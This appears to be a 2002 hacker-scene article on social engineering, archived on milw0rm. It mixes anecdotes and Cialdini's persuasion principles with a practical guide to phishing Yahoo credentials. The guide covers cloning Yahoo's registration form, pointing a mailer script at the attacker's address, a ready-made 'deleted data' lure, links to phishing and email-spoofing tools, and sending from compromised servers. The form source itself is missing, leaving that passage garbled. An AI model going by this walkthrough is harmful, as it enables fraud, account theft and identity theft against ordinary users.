Author : simo_at_morx_org Title : Social Engineering, Definition, true stories and exemples Date : 11/22/2002 True stories a anonymous person called a woman and says he is from her Local company customer service and due to a local error some of the customers data including Credit Cards and Social Security numbers have been deleted. The anonymous person asked the lady then to give him again her billing information, including the billing address,first and last name, the Credit card number, expire date and social security number that used to be in file before the incident. 20 days later the lady received her billing statement with 2500 $ to be paid as it was ordered : 1 digital camcorder 1 laptop, 3 mp3 and 2 dvds players. it's not always that every hacker is sitting in front his computer trying to hack into private networks by exploiting vulnerable servers in order to get private information such as credit cards numbers ... sometimes all they do is give it a call and exploit the humain stupidity "There's always the technical way to break into a network but sometimes it's easier to go through the people in the company. You just fool them into giving up their own security," says Keith A. Rhodes, chief technologist at the U.S. General Accounting Office, which has a Congressional mandate to test the network security at 24 different government agencies and departments. Another true story recounted by Kapil Raina, currently a security expert at Verisign and co-author of mCommerce Security: A Beginner's Guide, based on an actual workplace experience with a previous employer The story said One morning a few years back, a group of strangers walked into a large shipping firm and walked out with access to the firm.s entire corporate network. How did they do it? By obtaining small amounts of access, bit by bit, from a number of different employees in that firm. First, they did research about the company for two days before even attempting to set foot on the premises. For example, they learned key employees. names by calling HR. Next, they pretended to lose their key to the front door, and a man let them in. Then they "lost" their identity badges when entering the third floor secured area, smiled, and a friendly employee opened the door for them. The strangers knew the CFO was out of town, so they were able to enter his office and obtain financial data off his unlocked computer. They dug through the corporate trash, finding all kinds of useful documents. They asked a janitor for a garbage pail in which to place their contents and carried all of this data out of the building in their hands. The strangers had studied the CFO's voice, so they were able to phone, pretending to be the CFO, in a rush, desperately in need of his network password. From there, they used regular technical hacking tools to gain super-user access into the system. In this case, the strangers were network consultants performing a security audit for the CFO without any other employees' knowledge. They were never given any privileged information from the CFO but were able to obtain all the access they wanted through social engineering. 2- Definition I've readed too many articles of social engineering defining The basic goals of social engineering, and the different ways used by hackers, the goal is simply the same as hacking in general; gaining private information from a humain under some persuasion and influence in order to perform fraud, espionage, or simply to access a system or a network. targets can include commercial companies, financial and cultural institutions, hospitals or simply a yahoo account :) 3- Persuasion and influence techniques A substantial body of literature in social psychology demonstrates that there are at least six factors relying on peripheral routes to persuasion that are highly likely to persuade or influence others Authority : People are highly likely, in the right situation, to be highly responsive to assertions of authority, even when the person who purports to be in a position of authority is not physically present A study of three Midwestern hospitals showed how responsive people can be to such assertions. In the study, 22 separate nurses' stations were contacted by a researcher who identified himself (falsely) as a hospital physician, and told the answering nurse to give 20 milligrams of a specified prescription drug to a particular patient on the ward. Four factors should have indicated that the nurses might have questioned the order: It came from a "doctor" with whom the nurse had never before met or spoken; the "doctor" was transmitting a prescription by telephone, in violation of hospital policy; the drug in question was not authorized for use on the wards; and the dosage that the "doctor" had specified was clearly dangerous, twice the maximum daily dosage. Yet in 95 percent of the cases, the nurse proceeded to obtain the necessary dosage from the ward medicine cabinet and was on her way to administer it to the patient before observers intercepted her and told her of the experiment. Scarcity : People are also highly responsive to indications that a particular item they may want is in short supply or available for only a limited period. Indeed, research by Dr. Jack Brehm of Stanford University indicates that people come to desire that item even more when they perceive that their freedom to obtain it is or may be limited in some way. The belief that others may be competing for the short supply of the desired item may enhance the person's desire even more. Liking and similarity. It is a truly human tendency to like people who are like us. Our identification of a person as having characteristics identical or similar to our own -- places of birth, or tastes in sports, music, art, or other personal interests, to name a few -- provides a strong incentive for us to adopt a mental shortcut, in dealing with that person, to regard him or her more favorably merely because of that similarity. Reciprocation. A well-recognized rule of social interaction requires that if someone gives us (or promises to give us) something, we feel a strong inclination to reciprocate by providing something in return. Even if the favor that someone offers was not requested by the other person, the person offered the favor may feel a strong obligation to respect the rule of reciprocation by agreeing to the favor that the original offeror asks in return -- even if that favor is significantly costlier than the original favor. Commitment and consistency. Society also places great store by consistency in a person's behavior. If we promise to do something, and fail to carry out that promise, we are virtually certain to be considered untrustworthy or undesirable. We therefore are more likely to take considerable pains to act in ways that are consistent with actions that we have taken before, even if, in the fullness of time, we later look back and recognize that some consistencies are indeed foolish.One way in which social custom and practice makes us susceptible to appeals to consistency is the use of writing. A leading social psychologist, Professor Robert B. Cialdini, has observed that unless there is strong evidence to the contrary, "People have a natural tendency to think that a statement reflects the true attitude of the person who made it." Moreover, once the person who receives such a statement responds by preparing a written statement of his own -- whether a letter, an affidavit, or an e-mail -- it tends to make the writer believe in what he has written as well, adding to the impression that both parties have displayed their true attitudes and beliefs. Social proof : In many social situations, one of the mental shortcuts on which we rely, in determining what course of action is most appropriate, is to look to see what other people in the vicinity are doing or saying. This phenomenon, known as social proof, can prompt us to take actions that may be against our self-interest without taking the time to consider them more deeply. Cults from the Jonestown Temple to Heaven's Gate, for example, provide cogent evidence of how strong the effects of that phenomenon can be in the right circumstances. 4- Some ways used by hackers A- Online applications to Internet-fraud purposes : E-mails passwords and Credit cards numbers In this section i'm going to add an influence that have not been notified above, which's The influence of "greed" : let's say Someone with an electronic mail somewhere on the net receives a great e-mail giving him the chance to win 10.000 $ or a mercedes 2003 in reward of just entering his password and username for verification and registration purposes or sometimes even the victim is asked for his credit card and social security number for the same purpose. Basicaly this technique is ofen used to steal credit cards from online auctions users and web based email accounts The other classic well known method based on the auhtority influence which consists of sending an e-mail with a form asking the victim to re-enter his username/password or filling out a new registration form due to a local error that erased customers personal information including passwords,birth of dates, and secret questions answer. In fact the attacker doesnt need to be a good html/java/php programmer to code such forms, or simply the attacker doesnt need to bother himself and waste his time coding html, in this section i'll explain how it's easly to make online forms and web server script to get the data and then send it back to the sender e-mail. well first of all i know that most of you know how an html post form works and how the web server script gets data and then process it but let's get an overview with examples how can an attacker easly make a form in sometimes less than 5 minutes ? ok, let's say we are interessted in a yahoo account password, in that case the attacker chooses the type of influence, the attacker decided to take the authority influence, the bad guy goes first to mail.yahoo.com and try to sign up a new account, guess what will he/she get, a registration form already written (http://edit.yahoo.com/config/eval_register? .v=&.intl=&new=1&.done=&.src=ym&.partner=&. p=&promo=&.last=so) here we got the form and need just to modify some functions. The secend step is to get the html source of the page in order to modify on it, all we have to do is remove (
This is the attacker e-mail value (where the data will be returned) The e-mail subject Victim IP address and hostname (not really needed) Where we want the web mail script to redirect the victim after submiting the form mail.yahoo.com is ideal since he gotta automatically be redirected into his box Due to an involuntary local error your informations has been deleted from our database, please take some minutes to re-fill the following. Your informations will be immediatly recorded after submiting. Thanks. a pre-coded copy of the above example could be found at : www.angelfire/linux/simooo/simohackyahoo.html and example of a perl web based e-mailer can be found also at : www.angelfire/linux/simooo/emailer.pl (For educational and demonstration purposes only) Now all the attacker got to do is to use one of his compromised server to send the spoofed email to his victim using an email spoofer like htmlbomb.pl which can be found at www.morx.org/htmlbomb.txt or any program like ghosted.exe for windows which already has a list of public SMTP server in order included, the attacker spoofed e-mail will look like admin@yahoo.com or CService@yahoo.com influencing the victim could be done in many forms, and many ways trust authority by sending html forms, attaching backdoors trojans which would give complete access to the victim computer A good example of this was an AOL hack, documented by VIGILANTe: .In that case, the hacker called AOL.s tech support and spoke with the support person for an hour. During the conversation, the hacker mentioned that his car was for sale cheaply. The tech supporter was interested, so the hacker sent an e-mail attachment .with a picture of the car.. Instead of a car photo, the mail executed a backdoor exploit that opened a connection out from AOL through the firewall.. Online auctions : Here we can say that 3 of the psychological influences mentioned above are dominant in these frauds: through the victim's identification of someone good that he is prepared to buy immediately at a price he or she considers acceptable; reciprocity, through the criminal's promise to deliver the ordered goods once the victim has sent payment; and similarity, through the victim's willingness to do business with someone who apparently shares his or her interests in the collectible or computer merchandise being sold. 5- Reverse Social Engineering A final, and advanced method of gaining valuable information is known as .reverse social engineering.. This is when the hacker appears in a position of authority so that employees will ask him for information, If analysed, planned and executed well, reverse social engineering attacks may offer the hacker an even better chance of success 6- Conclusion : Social Engineering has different ways and purposes, hacking email passwords credit cards, backdooring and so on, Social Engineering is just unpatched since humain influence/ignorance/stupidity will keep existing. Other References : http://www.ameritech.com/content/0,3086,92,00.html http://www.natlconsumersleague.org/top10net.htm http://usatoday.com/life/cyber/tech/cte414.htm http://www.it.com.au/jargon/social_engineering.html http://www.seas.rochester.edu:8080/CNG/docs/Security/node9.html http://www.ciac.org/ciac/notes/Notes03a.shtml#Engineering Informatics," http://www.ifi.uio.no/iris20/proceedings/9.htm http://www.cert.org/advisories/CA-91.04.social.engineering.html http://www.newscientist.com/ns/981031/nspam.html http://www.news.com/News/Item/Textonly/0,25,17318,00.html # milw0rm.com [2006-04-08]